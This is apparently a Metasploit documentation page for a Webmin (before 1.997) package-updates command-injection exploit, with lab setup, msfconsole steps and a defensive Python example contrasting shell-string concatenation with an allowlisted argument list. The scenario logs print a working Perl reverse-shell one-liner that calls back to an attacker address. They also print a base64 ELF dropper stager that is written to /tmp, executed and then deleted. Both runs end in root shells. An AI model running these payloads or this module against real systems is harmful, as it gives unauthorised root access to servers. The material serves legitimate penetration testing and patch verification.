metasploit-gs/documentation/modules/exploit/linux/http/webmin_package_updates_rce.md
Christophe De La Fuente 38b845f247 Fix from code review
- Documentation typos
- Adding ARM64 support
2022-08-09 15:09:25 +02:00

Vulnerable Application

This module exploits an arbitrary command injection in Webmin versions prior to 1.997.

Webmin uses the OS package manager (apt, yum, etc.) to perform package updates and installation. Due to a lack of input sanitization, it is possible to inject an arbitrary command that will be concatenated to the package manager call.

This exploit requires authentication and the account must have access to the Software Package Updates module.
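The concatenation pattern described above, next to a hardened form. This is an added example in Python, not Webmin's Perl code or its actual fix; the `apt-get -y install` command line, the function names and the sample values are assumptions constructed for illustration.

```python
import re
import shlex

# Debian package-name rule: lowercase letters, digits, '+', '-', '.';
# at least two characters; first character alphanumeric.
PKG_NAME = re.compile(r"[a-z0-9][a-z0-9+.-]+")
CONTROL_CHARS = set("();<>|&")

BENIGN = "curl libssl1.1"           # constructed sample value
HOSTILE = "curl; echo INJECTED"     # constructed sample value


def naive_command(packages):
    """Vulnerable pattern: request text concatenated into a shell string."""
    return "apt-get -y install " + packages


def shell_control_operators(cmdline):
    """Show the control operators a shell would see in the string.

    Illustration only, not an input filter: the allowlist in safe_argv()
    is the actual control.
    """
    lex = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    return [tok for tok in lex if tok and set(tok) <= CONTROL_CHARS]


def safe_argv(packages):
    """Hardened pattern: allowlist every name and return an argv list."""
    names = packages.split()
    bad = [n for n in names if not PKG_NAME.fullmatch(n)]
    if not names or bad:
        raise ValueError(f"rejected package names: {bad!r}")
    # "--" ends option parsing; the list is meant for an exec-style call
    # (for example subprocess.run(argv) without shell=True), never a shell.
    return ["apt-get", "-y", "install", "--", *names]


if __name__ == "__main__":
    for value in (BENIGN, HOSTILE):
        cmd = naive_command(value)
        print("shell string :", cmd, shell_control_operators(cmd))
        try:
            print("argv list    :", safe_argv(value))
        except ValueError as err:
            print("argv list    :", err)
```

Nothing is executed: the script only prints how each form would be interpreted.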

Installation

Ubuntu

apt-get install libauthen-pam-perl libio-pty-perl
dpkg -i ./webmin_1.996_all.deb

Setup

  • Go to https://<target IP>:10000/
  • Log in as root with the OS password
  • Create a new user: Webmin > Webmin Users > Create a new privileged user > enter the username and password > click Create
  • Set up permissions: click on the username > Available Webmin modules > select "Software Package Updates" in the System module list > Save

Verification Steps

  1. Install and set up the application
  2. Start msfconsole
  3. Do: use exploit/linux/http/webmin_package_updates_rce
  4. Do: run lhost=<local IP> rhosts=<target IP> username=<username> password=<user password>
  5. You should get a shell.

Options

TARGETURI

Set this to the Webmin base path. The default is /.

USERNAME

The account username to use.

PASSWORD

The account password.

Scenarios

Webmin 1.996 on Ubuntu 18.04

  • Target 0 (Unix In-Memory)

msf6 exploit(linux/http/webmin_package_updates_rce) > run lhost=192.168.0.2 verbose=true rhosts=192.168.0.23 username=msfuser password=123456

[+] perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.0.2:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
[*] Started reverse TCP handler on 192.168.0.2:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Webmin 1.996 detected
[+] Webmin 1.996 is a supported target
[+] The target appears to be vulnerable.
[*] Attempting login
[+] Logged in!
[*] Sending payload
[*] Command shell session 4 opened (192.168.0.2:4444 -> 192.168.0.23:51860) at 2022-08-03 11:26:01 +0200

id
uid=0(root) gid=0(root) groups=0(root)

cat /etc/issue
Ubuntu 18.04.6 LTS \n \l

  • Target 1 (Linux Dropper)

msf6 exploit(linux/http/webmin_package_updates_rce) > run lhost=192.168.0.2 verbose=true rhosts=192.168.0.23 username=msfuser password=123456

[*] Started reverse TCP handler on 192.168.0.2:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Webmin 1.996 detected
[+] Webmin 1.996 is a supported target
[+] The target appears to be vulnerable.
[*] Attempting login
[+] Logged in!
[*] Sending payload
[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXMCokAFRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>'/tmp/abOFM.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/IBkCa' < '/tmp/abOFM.b64' ; chmod +x '/tmp/IBkCa' ; '/tmp/IBkCa' ; rm -f '/tmp/IBkCa' ; rm -f '/tmp/abOFM.b64'"]
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3020772 bytes) to 192.168.0.23
[*] Meterpreter session 5 opened (192.168.0.2:4444 -> 192.168.0.23:51870) at 2022-08-03 11:26:51 +0200
[*] Command Stager progress - 100.00% done (823/823 bytes)

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.0.23
OS           : Ubuntu 18.04 (Linux 5.4.0-122-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux